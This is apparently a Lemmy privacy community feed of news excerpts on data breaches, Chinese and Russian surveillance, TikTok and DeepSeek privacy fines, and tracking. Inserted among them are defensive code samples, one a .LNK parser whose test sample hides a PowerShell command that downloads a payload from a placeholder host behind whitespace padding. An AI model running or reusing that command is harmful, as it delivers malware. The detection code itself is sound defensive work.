submitted 2 years ago by [email protected] to c/[email protected]
submitted 2 hours ago by [email protected] to c/[email protected]

A newly emerged threat actor, going by the alias “Often9,” has posted on a prominent cybercrime and database trading forum, claiming to possess 428 million unique TikTok user records. The post is titled “TikTok 2025 Breach – 428M Unique Lines.”

The seller’s post, which appeared on the forum [on May 29, 2025], promises a dataset containing detailed user information such as:

  • Email addresses
  • Mobile phone numbers
  • Biography, avatar URLs, and profile links
  • TikTok user IDs, usernames, and nicknames
  • Account flags like private_account, secret, verified, and ttSeller status.
  • Publicly visible metrics such as follower counts, following counts, like counts, video counts, digg counts, and friend counts.

[...]

submitted 4 hours ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/36242205

  • Hundreds of millions of users are likely exposed.
  • Data leak contained billions of documents with financial data, WeChat and Alipay details.
  • The Cybernews research team believes the dataset was meticulously gathered and maintained for building comprehensive behavioral, economic, and social profiles of nearly any Chinese citizen.

The supermassive data leak likely exposed hundreds of millions of users, primarily from China, the Cybernews research team’s latest findings reveal. A humongous, 631-gigabyte database was left without a password, publicizing a mind-boggling 4 billion records.

Bob Dyachenko, cybersecurity researcher and owner at SecurityDiscovery.com, together with the Cybernews team, discovered billions upon billions of exposed records on an open instance.

[...]

The database consisted of numerous collections, containing from half a million to over 800 million records from various sources. The Cybernews research team believes the dataset was meticulously gathered and maintained for building comprehensive behavioral, economic, and social profiles of nearly any Chinese citizen.

“The sheer volume and diversity of data types in this leak suggests that this was likely a centralized aggregation point, potentially maintained for surveillance, profiling, or data enrichment purposes,” the team observed.

There’s no shortage of ways threat actors or nation states could exploit the data. With a data set of that magnitude, everything from large-scale phishing, blackmail, and fraud to state-sponsored intelligence gathering and disinformation campaigns is on the table.

[...]

The team managed to see sixteen data collections, likely named after the type of data they included.

The largest collection, with over 805 million records, was named “wechatid_db,” which most likely points to the data coming from the Baidu-owned super-app WeChat.

[...]

The second largest collection, “address_db,” had over 780 million records containing residential data with geographic identifiers. The third largest collection, simply named “bank,” had over 630 million records of financial data, including payment card numbers, dates of birth, names, and phone numbers.

Possessing only these three collections would enable skilled attackers to correlate different data points to find out where certain users live and what their spending habits, debts, and savings are.

Another major collection in the dataset was named in Mandarin, which roughly translates to “three-factor checks.” With over 610 million records, the collection most likely contained IDs, phone numbers, and usernames.

[...]

"Individuals who may be affected by this leak have no direct recourse due to the anonymity of the owner and lack of notification channels,” the team noted.

China-based data leaks are hardly new. We [Cybernews] ourselves have previously written about a data leak that exposed 1.5 billion Weibo, DiDi, Shanghai Communist Party, and others’ records, or a mysterious actor spilling over 1.2 billion records on Chinese users. More recently, attackers leaked 62 million iPhone users’ records online.

[...]

submitted 2 days ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/36106116

[...]

According to the measures, introduced by the Ministry of Public Security (MPS), each internet user in China will be issued with a unique “web number,” or wanghao (网号), that is linked to their personal information. While these IDs are, according to the MPS notice, to be issued on a strictly voluntary basis through public service platforms, the government appears to have been working on this system for quite some time — and state media are strongly promoting it as a means of guaranteeing personal “information security” (信息安全). With big plans afoot for how these IDs will be deployed, one obvious question is whether these measures will remain voluntary.

[...]

The measures bring China one step closer to centralized control over how Chinese citizens access the internet. The Cybersecurity Law of 2017 merely stipulated that when registering an account on, say, social media, netizens must register their “personal information” (个人信息), also called “identifying information” (身份信息). That led to uneven interpretations by private companies of what information was required. Whereas some sites merely ask for your name and phone number, others also ask for your ID number — while still others, like Huawei’s cloud software, want your facial biometrics on top of it.

[...]

Beyond the key question of personal data security, there is the risk that the cyber ID system could work as an internet kill switch on each and every citizen. It might grant the central government the power to bar citizens from accessing the internet, simply by blocking their cyber ID. “The real purpose is to control people’s behavior on the Internet,” Lao Dongyan cautioned last year.

[...]

Take a closer look at state media coverage of the evolving cyber ID system and the expansion of its application seems a foregone conclusion — even extending to the offline world. Coverage by CCTV reported last month that it would make ID verification easier in many contexts. “In the future, it can be used in all the places where you need to show your ID card,” a professor at Tsinghua’s AI Institute said of the cyber ID. Imagine using your cyber ID in the future to board the train or access the expressway.

[...]

While Chinese state media emphasize the increased ease and security cyber IDs will bring, the underlying reality is more troubling. Chinese citizens may soon find themselves dependent on government-issued digital credentials for even the most basic freedoms — online and off.

submitted 3 days ago by [email protected] to c/[email protected]

Native Android apps – including Facebook, Instagram, and several Yandex apps such as Maps, Navi, Browser, and Search – silently listen on fixed local ports on mobile devices to de-anonymize users’ browsing habits without consent, says a report published by a team of researchers from Spain-based IMDEA Networks Internet Analytics Group, and Dutch Radboud University.

Here is the technical report: https://localmess.github.io/

By embedding tracking code into millions of websites, Meta’s Pixel and Yandex Metrica have been able to map Android users’ browsing habits with their persistent identities (that is to say, with the account holder logged in). This method bypasses privacy protections offered by Android’s permission controls and even browsers’ Incognito Mode, affecting all major Android browsers. The international research team has disclosed the issue to several browser vendors, who are actively working on mitigations to limit this type of abuse. For instance, Chrome’s mitigation is scheduled to go into effect very soon.

These tracking companies have been doing this bypass for a long time: since 2017 in the case of Yandex, and Meta since September 2024. The number of people affected by this abuse is high, given that Meta Pixel and Yandex Metrica are estimated to be installed on 5.8 million and 3 million sites, respectively. It is also worth noting that evidence of this tracking practice has been observed only on Android.

[...]
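As an added example (not from the localmess report or the post above), here is the check a practitioner would run on a device to find the mechanism described: app-owned sockets bound to the loopback interface, which a tracking script in any web page on the same phone can reach. It parses the Linux `/proc/net/tcp` and `/proc/net/udp` tables (on Android they can be read from `adb shell` on builds that still expose them to the shell user; `ss -tulpn` is the alternative where they are hidden) and flags listeners owned by an app UID, since Android assigns installed apps UIDs from 10000 upward. The embedded tables are constructed sample data; the ports and UIDs in them are placeholders, not the ports named in the report.

```python
"""Find app-owned sockets that a web page's JavaScript could reach on the
loopback interface, by parsing the /proc/net/tcp and /proc/net/udp tables.
Added example, not from the localmess report; the tables below are constructed
sample data with placeholder ports and UIDs."""
import os

ANDROID_FIRST_APP_UID = 10000   # Android gives installed apps UIDs from 10000 upward
TCP_LISTEN = 0x0A               # st column value of a listening TCP socket
UDP_BOUND = 0x07                # bound UDP sockets show TCP_CLOSE (0x07) in /proc/net/udp


def parse_proc_net(table: str, proto: str):
    """Parse one /proc/net/{tcp,udp} table. local_address is 'IIIIIIII:PPPP':
    the IPv4 address as little-endian hex ('0100007F' is 127.0.0.1) and the
    port as big-endian hex. uid is the 8th whitespace-separated column."""
    rows = []
    for line in table.strip().splitlines()[1:]:        # first line is the header
        cols = line.split()
        ip_hex, port_hex = cols[1].split(":")
        ip = ".".join(str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
        rows.append({"proto": proto, "ip": ip, "port": int(port_hex, 16),
                     "state": int(cols[3], 16), "uid": int(cols[7])})
    return rows


def loopback_listeners(tcp_table: str, udp_table: str, min_uid: int = ANDROID_FIRST_APP_UID):
    """Return (proto, ip, port, uid) for sockets an app holds open on 127.0.0.1
    or on all interfaces (0.0.0.0); a browser on the same device can connect to both."""
    hits = []
    for r in parse_proc_net(tcp_table, "tcp") + parse_proc_net(udp_table, "udp"):
        listening = (r["proto"] == "tcp" and r["state"] == TCP_LISTEN) or \
                    (r["proto"] == "udp" and r["state"] == UDP_BOUND)
        if listening and r["ip"] in ("127.0.0.1", "0.0.0.0") and r["uid"] >= min_uid:
            hits.append((r["proto"], r["ip"], r["port"], r["uid"]))
    return sorted(hits)


# Constructed sample: an app (uid 10123) listening on 127.0.0.1:12345 over TCP,
# sshd (uid 0) on port 22, one established connection, and an app (uid 10456)
# with a UDP socket bound to 127.0.0.1:12506.
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:3039 00000000:0000 0A 00000000:00000000 00:00000000 00000000 10123        0 40001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 40002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:A4F2 0100007F:3039 01 00000000:00000000 00:00000000 00000000 10123        0 40003 1 0000000000000000 20 0 0 10 -1
"""
SAMPLE_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   0: 0100007F:30DA 00000000:0000 07 00000000:00000000 00:00000000 00000000 10456        0 40010 2 0000000000000000 0
   1: 00000000:0044 00000000:0000 07 00000000:00000000 00:00000000 00000000  1000        0 40011 2 0000000000000000 0
"""


def scan_live_or_sample():
    """Use the real tables when running on a Linux/Android host (for instance
    inside `adb shell`), otherwise fall back to the constructed sample."""
    if os.access("/proc/net/tcp", os.R_OK) and os.access("/proc/net/udp", os.R_OK):
        with open("/proc/net/tcp") as t, open("/proc/net/udp") as u:
            return loopback_listeners(t.read(), u.read())
    return loopback_listeners(SAMPLE_TCP, SAMPLE_UDP)


if __name__ == "__main__":
    for proto, ip, port, uid in scan_live_or_sample():
        print(f"{proto} {ip}:{port} held by uid {uid}")
```

A hit only tells you that an app is reachable from the browser; the next step is to map the UID to a package (`adb shell pm list packages -U`) and confirm what the port accepts, since a legitimate local service and an identity bridge look identical in this table.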

submitted 3 days ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/35993881

[...]

Under draft legislation that the State Duma approved at first reading on May 22, 2025, a bill will require banks and merchants to facilitate digital ruble transactions and a universal QR payment code for purchases. Beginning October 1, 2025, the digital ruble will be used for a limited range of federal budget expenditures, transitioning on January 1, 2026, to full, unrestricted use for all federal outlays.

[...]

Kremlin financiers will track every digital ruble transaction in real time, granting authorities the power to block citizens’ accounts without a court order and automatically deduct taxes, fines, and other charges. Social benefits payable in digital rubles will be usable only for government‐approved categories of goods and services, and spending may be restricted based on a citizen’s place of residence or product type.

[...]

Critics—from human rights groups to economic analysts—argue the digital ruble will entrench state surveillance. According to The Cryptonomist, Russia’s CBDC may replicate China’s model of monitoring every transaction, but with even tighter Kremlin oversight. Ukrainian intelligence observers highlight the risk of a “behavioral loyalty” system, where digital currency access depends on citizens’ political and social “reliability.”

Previously, it was reported that Latvia’s Defense Intelligence and Security Service released a 48-page public handbook designed to help civilians identify and report suspected Russian operatives. The guide details indicators such as ragged appearance and suspicious behavior, offers safe reporting practices, and includes case studies illustrating espionage tactics in both urban and rural settings.

[...]

submitted 6 days ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/35817780

TikTok has launched a High Court challenge to a €530m fine imposed on it by the Data Protection Commission (DPC).

It is the latest legal attempt by Big Tech to overturn penalties imposed by the Irish privacy regulator. Of the more than €4bn in fines levied on companies including Meta and Amazon, only €20m has been paid so far.

The other penalties are being challenged in the Irish courts. There is no date set for any of the hearings, as a decision is awaited from the European Court of Justice on a key legal point.

[...]

“TikTok failed to verify, guarantee and demonstrate that the personal data of European Economic Area (EEA) users, remotely accessed by staff in China, was afforded a level of protection essentially equivalent to that guaranteed within the EU,” DPC deputy commissioner Graham Doyle said at the time.

“As a result of TikTok’s failure to undertake the necessary assessments, TikTok did not address potential access by Chinese authorities to EEA personal data under Chinese anti-terrorism, counter-espionage and other laws identified by TikTok as materially diverging from EU standards.”

[...]

In a further “serious development”, the DPC noted that, throughout its inquiry, TikTok had said it did not store EEA user data on servers in China. However, in April it told the regulator that, two months earlier, it discovered that “limited” data had in fact been stored on Chinese servers.

“TikTok informed the DPC that this discovery meant it had provided inaccurate information to the inquiry,” the regulator pointed out. The DPC is currently engaging with other European data regulators on that issue.

submitted 4 days ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/35915645

TikTok introduced a slew of new advertiser tools at the company’s annual advertiser summit on June 3rd. The new products range from AI-powered ad tools to new features connecting creators and brands, but the overall picture is clear: advertiser content on TikTok is about to become much more tailored and specific.

The company will give brands precise details about how their target audience is using the platform — including AI-generated suggestions on ads to run. Using a tool called Insight Spotlight, advertisers will be able to sort by user demographics and industry to see what videos users in the target group are watching and what keywords are associated with popular content. In an example provided by TikTok, an AI-generated suggestion recommends that a brand “produce video content focused on ‘hormonal health’ for female, English-speaking users” and to include a specific keyword. Another feature in Insight Spotlight analyzes users’ viewing history to identify types of content that are bubbling up.

[...]

submitted 1 week ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/35554000

[...]

Chinese hackers targeted the Czech Foreign Ministry in a sophisticated cyberattack that lasted more than a year, the government said Tuesday, formally blaming Beijing for infiltrating one of the country’s most sensitive communication systems.

[...]

Foreign Minister Jan Lipavský summoned the Chinese ambassador to Prague, Feng Biao, on Tuesday morning to formally protest the cyberattack. He said the ministry’s system had long suffered from outdated technology and security flaws, which made the breach possible.

[...]

This cyberattack didn’t expose personal data but shows ongoing risks to [...] security. Outdated systems leave sensitive government info vulnerable, which could affect national security and public services. Cooperation with NATO, the EU, and allies aims to prevent future attacks and protect services like passports and healthcare. While your data wasn’t at risk this time, the breach highlights the growing need for strong cybersecurity to keep information safe.

submitted 1 month ago* (last edited 1 month ago) by [email protected] to c/[email protected]

submitted 1 month ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/33723368

European Union privacy watchdogs fined TikTok 530 million euros ($600 million) on Friday after a four-year investigation found that the video sharing app’s data transfers to China breached strict data privacy rules in the EU.

Ireland’s Data Protection Commission also sanctioned TikTok for not being transparent with users about where their personal data was being sent and it ordered the company to comply with the rules within six months.

[...]

TikTok, whose parent company ByteDance is based in China, has been under scrutiny in Europe over how it handles personal information of its users amid concerns from Western officials that it poses a security risk over user data sent to China. In 2023, the Irish watchdog also fined the company hundreds of millions of euros in a separate child privacy investigation.

[...]

The Irish watchdog said its investigation found that TikTok failed to address “potential access by Chinese authorities” to European users’ personal data under Chinese laws on anti-terrorism, counter-espionage, cybersecurity and national intelligence that were identified as “materially diverging” from EU standards.

[...]

TikTok faces further scrutiny from the Irish regulator, which said that the company had provided inaccurate information throughout the inquiry by saying that it didn’t store European user data on Chinese servers. It wasn’t until April that it informed the regulator that it discovered in February that some data had in fact been stored on Chinese servers.

[...]

submitted 1 month ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/33548424

  • The agency said that before DeepSeek’s chatbot was removed from app stores in South Korea, the company was transferring user data to firms in China and the U.S. without consent.
  • The findings were released in relation to an ongoing investigation into DeepSeek, and the company has been sent corrective recommendations.

South Korea’s data protection authority has concluded that Chinese artificial intelligence startup DeepSeek collected personal information from local users and transferred it overseas without their permission.

The authority, the Personal Information Protection Commission [PIPC], released its written findings on Thursday in connection with a privacy and security review of DeepSeek.

It follows DeepSeek’s removal of its chatbot application from South Korean app stores in February at the recommendation of PIPC.

[...]

During DeepSeek’s presence in South Korea, it transferred user data to several firms in China and the U.S. without obtaining the necessary consent from users or disclosing the practice, the PIPC said.

The agency highlighted a particular case in which DeepSeek transferred information from user-written AI prompts, as well as device, network, and app information, to a Chinese cloud service platform named Beijing Volcano Engine Technology Co.

[...]

When the data protection authority announced the removal of DeepSeek from local app stores, it signaled that the app would become available again once the company implemented the necessary updates to comply with local data protection policy.

That investigation followed reports that some South Korean government agencies had banned employees from using DeepSeek on work devices. Other global government departments, including in Taiwan, Australia, and the U.S., have reportedly instituted similar bans.

submitted 1 month ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/33122696

[...]

The first rupture appeared on January 29 when cloud security firm Wiz stumbled upon an exposed ClickHouse database tagged “ds‑log‑prod‑001”. Anyone with a browser could have accessed more than a million log lines: raw chat history, API keys, and even internal service tokens. Wiz engineers demonstrated that with two clicks they could seize “full database control”, inject malicious code and pivot into the rest of DeepSeek’s infrastructure.

A week later mobile forensics specialists at NowSecure published a parallel autopsy of the iOS build. Their findings read like a checklist of everything Apple’s security team tells developers not to do: hard‑coded encryption keys, deprecated 3DES ciphers and App Transport Security switched off globally, allowing chats to travel unencrypted. The company urged enterprises to ban the app outright. However, DeepSeek’s parentage turned out to be even more troubling.

Corporate registries in Zhejiang and the Cayman Islands show the chatbot is a wholly owned offshoot of High‑Flyer Quant, a hedge fund founded in 2016 by the 38‑year‑old trader and CEO of DeepSeek, Liang Wenfeng. Reuters reporting confirms that High‑Flyer pivoted from equity markets to artificial intelligence research in 2023, building two super‑computing clusters stuffed with Nvidia A100 processors before US export controls came into force.

[...]

Sources say the Computer Emergency Response Team of India (CERT‑In) is preparing a broader advisory under the new Digital Personal Data Protection Act that could push local app stores to delist the software if it fails a security audit. Other democracies have gone further: Italy, Australia and Taiwan have banned DeepSeek from public‑sector systems, with Taipei warning of “systemic espionage risk”.

[...]

High‑Flyer Quant’s pitch decks boast of “harvesting alternative data at planetary scale”. If every trade idea whispered into DeepSeek ends up in a Hangzhou warehouse, the company enjoys a real‑time map of market sentiment unavailable to Wall Street — and unpoliced by the Securities and Exchange Commission. For American fund managers and Indian startups alike, using the chatbot could be tantamount to CC‑ing a rival on every brainstorming session.

[...]
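As an added example, not NowSecure's tooling or anything from the article above, the "App Transport Security switched off globally" finding in the post corresponds to one key in an iOS app's Info.plist: `NSAllowsArbitraryLoads` under `NSAppTransportSecurity`. The Python below audits that dictionary with the standard `plistlib` and reports each relaxation, so the weak configuration can be compared with a hardened one that keeps ATS at its default and pins a stricter TLS floor for a single host. Both plists are constructed samples, and the bundle identifier and hostname in them are placeholders.

```python
"""Audit App Transport Security (ATS) keys in an iOS Info.plist. Added example;
the two plists below are constructed samples with a placeholder hostname."""
import plistlib

WEAK_TLS_VERSIONS = ("TLSv1.0", "TLSv1.1")


def ats_findings(info_plist: bytes) -> list:
    """Return (severity, message) pairs for every ATS relaxation found.
    An empty list means ATS is at its default: HTTPS with TLS 1.2+ to every host."""
    ats = plistlib.loads(info_plist).get("NSAppTransportSecurity", {})
    findings = []
    if ats.get("NSAllowsArbitraryLoads"):
        findings.append(("high", "NSAllowsArbitraryLoads=true: ATS disabled for every host, plaintext HTTP allowed"))
    for key in ("NSAllowsArbitraryLoadsInWebContent", "NSAllowsArbitraryLoadsForMedia"):
        if ats.get(key):
            findings.append(("medium", f"{key}=true: ATS disabled for that class of loads"))
    if ats.get("NSAllowsLocalNetworking"):
        findings.append(("low", "NSAllowsLocalNetworking=true: plaintext allowed to local-network hosts"))
    for host, exc in ats.get("NSExceptionDomains", {}).items():
        scope = host + (" (and subdomains)" if exc.get("NSIncludesSubdomains") else "")
        if exc.get("NSExceptionAllowsInsecureHTTPLoads"):
            findings.append(("medium", f"{scope}: NSExceptionAllowsInsecureHTTPLoads=true"))
        tls = exc.get("NSExceptionMinimumTLSVersion")
        if tls in WEAK_TLS_VERSIONS:
            findings.append(("medium", f"{scope}: minimum TLS lowered to {tls}"))
        if exc.get("NSExceptionRequiresForwardSecrecy") is False:
            findings.append(("low", f"{scope}: forward secrecy not required"))
    return findings


# Constructed sample: ATS switched off globally plus a per-host exception that
# lowers the TLS floor and drops the forward-secrecy requirement.
WEAK_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.chat</string>
  <key>NSAppTransportSecurity</key><dict>
    <key>NSAllowsArbitraryLoads</key><true/>
    <key>NSExceptionDomains</key><dict>
      <key>api.example.invalid</key><dict>
        <key>NSIncludesSubdomains</key><true/>
        <key>NSExceptionMinimumTLSVersion</key><string>TLSv1.0</string>
        <key>NSExceptionRequiresForwardSecrecy</key><false/>
      </dict>
    </dict>
  </dict>
</dict></plist>
"""

# Constructed sample of the corrected form: no global switch, and the only
# exception raises the floor for that host rather than lowering it.
HARDENED_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.example.chat</string>
  <key>NSAppTransportSecurity</key><dict>
    <key>NSExceptionDomains</key><dict>
      <key>api.example.invalid</key><dict>
        <key>NSIncludesSubdomains</key><true/>
        <key>NSExceptionMinimumTLSVersion</key><string>TLSv1.3</string>
      </dict>
    </dict>
  </dict>
</dict></plist>
"""

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else WEAK_INFO_PLIST
    for severity, message in ats_findings(data) or [("info", "ATS at default")]:
        print(f"[{severity}] {message}")
```

On a real app the Info.plist sits inside the .ipa at `Payload/<App>.app/Info.plist` and is usually binary-encoded; `plistlib.loads` detects both the XML and binary forms, so the audit runs unchanged on either.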

submitted 2 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/32102322

TikTok owner ByteDance is set to be hit by a privacy fine of more than €500 million for illegally shipping European users’ data to China, adding to the growing global backlash over the video-sharing app.

Ireland’s data protection commission, the company’s main regulator in Europe, will issue the penalty against TikTok before the end of the month, according to people familiar with the matter.

The move comes after a lengthy investigation found the Chinese business fell foul of the European Union’s General Data Protection Regulation in sending the information to China to be accessed by engineers, added the people, who spoke under condition of anonymity.

[...]

As part of the decision from Ireland’s data protection commission, the regulator will order TikTok to suspend the unlawful data processing in China within a set time frame. China has long provoked the ire of privacy activists, who claim that the nation’s mass surveillance regime violates fundamental rights.

TikTok has been in the crosshairs of the Irish data protection commission before. In September 2023, it was fined €345 million for alleged lapses in the way it cares for children’s personal data. The watchdog has also sounded the alarm over Big Tech firms shipping the personal data of European citizens outside of the 27-member bloc, slapping a record €1.2 billion fine against Facebook owner Meta Platforms Inc. for failing to protect personal information from the American security services.

The Irish probe into TikTok started in 2021, when the regulator’s then head Helen Dixon claimed that EU user data could be accessed by “maintenance and AI engineers in China.”

[...]

Apple Offers Apps With Ties to Chinese Military (www.techtransparencyproject.org)
submitted 2 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/31957116

Millions of Americans have downloaded apps that secretly route their internet traffic through Chinese companies, according to an investigation by the Tech Transparency Project (TTP), including several that were recently owned by a sanctioned firm with links to China’s military.

TTP’s investigation found that one in five of the top 100 free virtual private networks in the U.S. App Store during 2024 were surreptitiously owned by Chinese companies, which are obliged to hand over their users’ browsing data to the Chinese government under the country’s national security laws. Several of the apps traced back to Qihoo 360, a firm declared by the Defense Department to be a “Chinese Military Company." Qihoo did not respond to questions about its app-related holdings.

[...]

VPNs allow users to mask the IP address that can identify them, and, in theory, keep their internet browsing private. For that reason, they have been used by people around the world to sidestep government censorship or surveillance, or because they believe it will improve their online security. In the U.S., kids often download free VPNs to play games or access social media during school hours.

However, VPNs can themselves pose serious risks because the companies that provide them can read all the internet traffic routed through them. That risk is compounded in the case of Chinese apps, given China’s strict laws that can force companies in that country to secretly share access to their users’ data with the government.

[...]

The VPN apps identified by TTP have been downloaded more than 70 million times from U.S. app stores, according to data from AppMagic, a mobile apps market intelligence firm.

[...]

The findings raise questions about Apple’s carefully cultivated reputation for protecting user privacy. The company has repeatedly sought to fend off antitrust legislation designed to loosen its control of the App Store by arguing such efforts could compromise user privacy and security. But TTP’s investigation suggests that Apple is not taking adequate steps to determine who owns the apps it offers its users and what they do with the data they collect. More than a dozen of the Chinese VPNs were also available in Apple’s App Store in France in late February, showing that the issue extends to other Western markets.

[...]

submitted 2 months ago by [email protected] to c/[email protected]

cross-posted from: https://lemmy.sdf.org/post/31274457

An exploitation avenue found by Trend Micro in Windows has been used in an eight-year-long spying campaign, but there's no sign of a fix from Microsoft, which apparently considers this a low priority.

The attack method is low-tech but effective, relying on malicious .LNK shortcut files rigged with commands to download malware. While appearing to point to legitimate files or executables, these shortcuts quietly include extra instructions to fetch or unpack and attempt to run malicious payloads.

Ordinarily, the shortcut's target and command-line arguments would be clearly visible in Windows, making suspicious commands easy to spot. But Trend's Zero Day Initiative said it observed North Korea-backed crews padding out the command-line arguments with megabytes of whitespace, burying the actual commands deep out of sight in the user interface.

Trend reported this to Microsoft in September last year and estimates that it has been used since 2017. It said it had found nearly 1,000 tampered .LNK files in circulation but estimates the actual number of attacks could have been higher.

"This is one of many bugs that the attackers are using, but this is one that is not patched and that's why we reported it as a zero day," Dustin Childs, head of threat awareness at the Zero Day Initiative, [said].

"We told Microsoft but they consider it a UI issue, not a security issue. So it doesn't meet their bar for servicing as a security update, but it might be fixed in a later OS version, or something along those lines."

[...]
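An added example, not Trend Micro's tooling or anything from the article above: a small Python parser for the Shell Link (.LNK) binary format that extracts the COMMAND_LINE_ARGUMENTS string and flags the padding trick described in the post, a long whitespace run in the arguments with the real command placed after it. The parser follows the MS-SHLLINK layout (76-byte header, LinkFlags at offset 0x14, optional LinkTargetIDList and LinkInfo blocks, then the count-prefixed StringData fields). The `build_lnk` helper constructs a minimal shortcut for testing; the payload it embeds is a constructed placeholder, and the 256-character padding threshold is an assumption, not a number from the report.

```python
"""Parse the StringData section of a Windows Shell Link (.LNK) and flag
command-line arguments padded with whitespace to push the real command out of
the Properties dialog. Added example, not Trend Micro's tooling; the .LNK
samples are built by build_lnk() below and their payload is a placeholder."""
import re
import struct

HEADER_SIZE = 0x4C                                               # fixed ShellLinkHeader length
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def _read_string(buf, off, unicode):
    """StringData field: uint16 CountCharacters followed by that many characters."""
    count = struct.unpack_from("<H", buf, off)[0]
    off += 2
    if unicode:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("cp1252", "replace"), off + count


def lnk_string_data(buf: bytes) -> dict:
    """Return the StringData fields of a .LNK, skipping the optional
    LinkTargetIDList and LinkInfo blocks that precede them."""
    if buf[:4] != b"L\x00\x00\x00" or buf[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", buf, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", buf, off)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", buf, off)[0]       # LinkInfoSize covers the whole block
    out = {}
    for bit, field in STRING_FIELDS:
        if flags & bit:
            out[field], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return out


def inspect_arguments(buf: bytes, min_pad: int = 256) -> dict:
    """Flag arguments containing a whitespace run of at least min_pad characters
    (spaces, tabs, CR/LF all count) and return whatever follows that run."""
    args = lnk_string_data(buf).get("arguments", "")
    runs = list(re.finditer(r"\s+", args))
    longest = max(runs, key=lambda m: m.end() - m.start(), default=None)
    pad = longest.end() - longest.start() if longest else 0
    return {"flagged": pad >= min_pad, "longest_ws_run": pad, "total_length": len(args),
            "hidden_command": args[longest.end():].strip() if pad >= min_pad else ""}


def build_lnk(arguments: str, name: str = "") -> bytes:
    """Construct a minimal Unicode .LNK carrying only StringData (test input)."""
    flags = IS_UNICODE | HAS_ARGUMENTS | (HAS_NAME if name else 0)
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LINK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return bytes(header) + (enc(name) if name else b"") + enc(arguments)


# Constructed samples: an ordinary shortcut and one with 900 spaces in front of
# the command; the URL is a placeholder on the reserved .invalid TLD.
BENIGN_LNK = build_lnk("/k echo hello", name="Notes")
PADDED_LNK = build_lnk(" " * 900 + "/c powershell -w hidden -nop -c \"iwr http://example.invalid/s -o %TEMP%\\s.exe\"")

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, inspect_arguments(f.read()))
```

Run it over a directory of shortcuts from mail attachments or a triage share; a flagged file gives you the hidden command directly, which is what the Properties dialog hides by showing only the leading part of the Target field.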

submitted 2 months ago by [email protected] to c/[email protected]

cross-posted from: https://slrpnk.net/post/19675447

Here is an Invidious link for the video (and 'Lola' part starts at ~5 minutes)

To demonstrate this, Sadoun introduces the audience to “Lola,” a hypothetical young woman who represents the typical web user that Publicis now has data about. “At a base level, we know who she is, what she watches, what she reads, and who she lives with,” Sadoun says. “Through the power of connected identity, we also know who she follows on social media, what she buys online and offline, where she buys, when she buys, and more importantly, why she buys.”

It gets worse. “We know that Lola has two children and that her kids drink lots of premium fruit juice. We can see that the price of the SKU she buys has been steadily rising on her local retailer’s shelf. We can also see that Lola’s income has not been keeping pace with inflation. With CoreAI, we can predict that Lola has a high propensity to trade down to private label,” Sadoun says, meaning that the algorithm apprehends whether Lola is likely to start buying a cheaper brand of juice. If the software decides this is the case, the CoreAI algo can automatically start showing Lola ads for those reduced price juice brands, Sadoun says.

submitted 2 months ago by [email protected] to c/[email protected]

Firefox may be incompatible with DFSG and probably other similar principles and TOS.

From the bug report:

The new Terms of Use, from what I can see, are in violation of the DFSG points 5 and 6:

  5. No discrimination against persons or groups

Rationale:

The terms of use grant Mozilla the right to terminate anyone's access:

Mozilla can suspend or end anyone’s access to Firefox at any time for any reason

https://www.mozilla.org/en-US/about/legal/terms/firefox/#mozilla-can-update-or-terminate-this-agreement

  6. No discrimination against fields of endeavor

Rationale:

The terms of use don't allow you to use Firefox to break the law. While this seems a reasonable term, it wouldn't be so reasonable for a dissident in an oppressive country.

you agree that you will not use Firefox to [...] violate any applicable laws or regulations.

...

Apart from these violations of the DFSG, Firefox now has permission to leak user data to Mozilla, and who knows who else they decide to sell it to later. This is a security bug.

